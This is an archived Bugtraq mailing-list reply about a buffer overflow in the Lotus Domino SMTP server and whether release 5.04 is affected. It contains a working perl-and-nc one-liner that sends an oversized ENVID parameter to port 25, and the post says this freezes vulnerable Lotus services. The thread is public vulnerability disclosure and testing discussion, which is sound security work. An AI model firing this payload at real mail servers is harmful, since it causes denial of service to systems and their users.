Bugtraq mailing list archives
Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
From: Fyodor <fygrave () SCORPIONS NET>
Date: Mon, 6 Nov 2000 03:27:40 -0500
However, Lotus Notes/Domino Release 5.0.4 QMR fix list indicates that the problem was already fixed in 5.04. See http://www.support.lotus.com/sims2.nsf/802ee480bdd32d0b852566fa005acf8d/191a4daad1890947852569580069a59d?OpenDocument&Highlight=2,ENVID and click on Mail Server - Router - SMTP The SPR# is CDOY4GFP35 Are you sure 5.04 is affected? Or the technote is lying?
Well, at least eval. version for linux platform is vulnerable. if you want to be confident whether it affects your server or not here's a small hint to play around : :-) perl -e 'print "ehlo foo\nmail from:blah () yahoo com\nrcpt to:admin@localhost ENVID=", "A"x900;' | nc lotus.box 25 or something like that.. :) if all your lotus services get frozen afterwards, you are vulnerable. -Fyodor
Current thread:
- [SAFER] Buffer overflow in Lotus Domino SMTP Server Security Research Team (Nov 04)
- <Possible follow-ups>
- Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server CaptainBig (Nov 06)
- Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server Fyodor (Nov 07)
- Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server Vanja Hrustic (Nov 07)